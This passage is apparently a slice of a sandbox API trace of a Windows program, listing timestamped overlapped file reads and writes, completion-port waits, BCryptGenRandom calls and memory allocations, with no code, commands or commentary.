lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.705] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.714] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.732] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.753] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.766] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.780] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.785] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.824] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x660, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.832] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0175.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.845] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.845] free (_Block=0x3e305b8) [0175.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.845] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.846] free (_Block=0x1fa91d0) [0175.846] free (_Block=0x1fa2ed8) [0175.846] free (_Block=0x1fa90b8) [0175.846] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0175.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.863] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.863] free (_Block=0x3e305b8) [0175.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.863] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.863] free (_Block=0x1fa91d0) [0175.863] free (_Block=0x1fa2ed8) [0175.863] free (_Block=0x1fa90b8) [0175.863] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0175.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.876] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.876] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.876] free (_Block=0x3e305b8) [0175.876] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.876] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.877] free (_Block=0x1fa91d0) [0175.877] free (_Block=0x1fa2ed8) [0175.877] free (_Block=0x1fa90b8) [0175.877] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.924] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.924] free (_Block=0x3e305b8) [0175.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.924] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.925] free (_Block=0x1fa91d0) [0175.925] free (_Block=0x1fa2ed8) [0175.925] free (_Block=0x1fa90b8) [0175.925] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.934] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.934] free (_Block=0x3e305b8) [0175.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.934] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.934] free (_Block=0x1fa91d0) [0175.934] free (_Block=0x1fa2ed8) [0175.934] free (_Block=0x1fa90b8) [0175.934] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.946] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.961] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.989] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.003] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.017] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.031] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.042] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x25b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.057] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.143] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1708, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.157] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1264, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.158] CloseHandle (hObject=0x308) returned 1 [0176.158] free (_Block=0x3d70450) [0176.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.161] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1960, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.162] CloseHandle (hObject=0x2a4) returned 1 [0176.162] free (_Block=0x3df0008) [0176.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.178] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1d84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0176.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0176.199] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.199] free (_Block=0x3e305b8) [0176.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.199] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.200] free (_Block=0x1fa91d0) [0176.200] free (_Block=0x1fa2ed8) [0176.200] free (_Block=0x1fa90b8) [0176.200] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0176.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0176.225] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.225] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.225] free (_Block=0x3e305b8) [0176.225] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.225] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.226] free (_Block=0x1fa91d0) [0176.226] free (_Block=0x1fa2ed8) [0176.228] free (_Block=0x1fa90b8) [0176.228] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.240] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xae20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0176.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0176.255] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.255] free (_Block=0x3e305b8) [0176.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.255] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.255] free (_Block=0x1fa91d0) [0176.255] free (_Block=0x1fa2ed8) [0176.255] free (_Block=0x1fa90b8) [0176.256] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, 